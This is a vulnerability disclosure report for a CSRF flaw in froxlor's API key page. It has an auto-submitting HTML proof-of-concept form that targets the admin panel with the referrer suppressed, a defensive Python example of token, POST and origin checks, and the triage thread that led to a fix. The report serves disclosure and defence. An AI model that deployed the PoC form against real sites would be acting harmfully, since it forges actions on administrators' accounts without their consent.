Unintended API key generation in froxlor/froxlor

Valid

Reported on

Nov 9th 2022


Description

The API keys section is vulnerable to CSRF. An attacker can generate a key on the admin's account without prior knowledge of the admin's credentials: a successful CSRF request causes a new API key to be created on the admin's account.

Proof of Concept


<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://demo.froxlor.org/admin_index.php">
      <meta name="referrer" content="no-referrer">
      <input type="hidden" name="page" value="apikeys" />
      <input type="hidden" name="action" value="add" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
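The PoC above works because the key-generation action accepts a plain GET form submission with no proof that the request originated from the panel's own page, and it suppresses the Referer header so a naive referrer check would see nothing. The following is an added example, not froxlor's code or its fix, showing a defensive handler for the same page/action pair: it refuses GET for the state-changing action, requires a per-session CSRF token compared in constant time, and treats a missing Origin/Referer as cross-site. The Session, Request and handle_apikeys names, and the SITE_ORIGIN value taken from the PoC URL, are assumptions for the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Origin of the panel; taken from the PoC's form action URL (assumed for this example).
SITE_ORIGIN = "https://demo.froxlor.org"


@dataclass
class Session:
    """Minimal stand-in for a server-side session (constructed for the example)."""
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))
    api_keys: list = field(default_factory=list)


@dataclass
class Request:
    """Minimal stand-in for an incoming HTTP request (constructed for the example)."""
    method: str
    params: dict
    headers: dict = field(default_factory=dict)


def same_site_origin(req, site_origin=SITE_ORIGIN):
    """True only if Origin (or, failing that, Referer) names our own site.

    A missing header is treated as cross-site: the PoC deliberately sends the
    form with referrer suppressed, so 'absent' must not be read as 'trusted'.
    """
    origin = req.headers.get("Origin") or req.headers.get("Referer")
    if origin is None:
        return False
    # Exact match for Origin; prefix-with-slash for a Referer that carries a path.
    return origin == site_origin or origin.startswith(site_origin + "/")


def csrf_ok(req, session):
    """Validate the per-session CSRF token with a constant-time comparison."""
    token = req.params.get("csrf_token", "")
    # Encode both sides so a non-ASCII token cannot raise instead of failing.
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return False
    return same_site_origin(req)


def handle_apikeys(req, session):
    """Handle page=apikeys&action=add; returns (status, message)."""
    if req.params.get("page") != "apikeys" or req.params.get("action") != "add":
        return 400, "unknown action"
    # Key generation changes state, so it must never be reachable via GET.
    if req.method != "POST":
        return 405, "key generation requires POST"
    if not csrf_ok(req, session):
        return 403, "CSRF check failed"
    session.api_keys.append(secrets.token_hex(16))
    return 200, "key generated"


if __name__ == "__main__":
    s = Session()
    # The request the PoC form produces: GET, no token, no Origin/Referer.
    poc = Request("GET", {"page": "apikeys", "action": "add"})
    print(handle_apikeys(poc, s))
    # A legitimate submission from the panel's own page.
    legit = Request("POST",
                    {"page": "apikeys", "action": "add", "csrf_token": s.csrf_token},
                    {"Origin": SITE_ORIGIN})
    print(handle_apikeys(legit, s), len(s.api_keys))
```

The three checks are layered on purpose: rejecting GET stops the exact PoC, the token stops a cross-site POST, and the origin check catches a leaked or guessed token. A Referer-style check on its own is not enough, since the PoC shows the attacker can simply suppress the header.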

Video PoC


Visit: https://vimeo.com/769066009

Impact

Unauthorized API key generation on the admin's account

We are processing your report and will contact the froxlor team within 24 hours. 2 months ago
We have contacted a member of the froxlor team and are waiting to hear back 2 months ago
Michael Kaufmann validated this vulnerability 2 months ago

Thank you for the report, it will be fixed in the next scheduled release on 2nd of December

Kiran PP has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Kiran PP
2 months ago

Researcher


Can we go for a CVE? @maintainer @admin

Pavlos
2 months ago

Admin


The maintainer will choose whether to assign a CVE once they publish your vulnerability on Dec 2nd.

Kiran PP
a month ago

Researcher


Then please assign a CVE for this one! @maintainer

Kiran PP
a month ago

Researcher


@maintainer & @admin, A short reminder!

Please go for a CVE

Pavlos
a month ago

Admin


No need for reminders :)

Michael Kaufmann marked this as fixed in 0.10.38.3 with commit 4d454a a month ago
Michael Kaufmann has been awarded the fix bounty
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Dec 3rd 2022
api_keys.php#L0 has been validated
Kiran PP
a month ago

Researcher


  1. If it's not eligible for the CVE then you can point out the reason

  2. It was said it'd be released on December 2nd; now it's changed to the 3rd. So, reminders are needed in some cases.

  3. Many users pointed out your unprofessional behaviour, Mr Pavlos. Tbh, I felt sad about it.

@admin

Michael
a month ago

Maintainer


@Krian you seem to be VERY impatient. I just selected a SCHEDULED publication of this report for tomorrow because I have JUST released a new version and would like to give users at least ONE day to update.

Reason for no CVE: a new API key is being generated which you cannot access. It does no harm in any way other than to exist.

Kiran PP
a month ago

Researcher


@Maintainer No issues and no impatience from my side, mate. I agree with your statement, but you have to let me know about the case. Otherwise I won't be able to understand.

If you'd clearly said so at first, I'd never have repeated myself. So, it's nothing about impatience, but the lack of responses matters 👍

You can read the above comments; I didn't even mention you in some statements.

Regards,

Pavlos
a month ago

Admin


I'm sorry you're unhappy with me. I have tens of thousands of users to attend to alone and the @admin spamming just makes it worse for everyone.

On another note, please be more patient with the maintainer; open source is a voluntary sport.

Kiran PP
a month ago

Researcher


Appreciated!

If updates are fine, no more issues

Michael Kaufmann published this vulnerability a month ago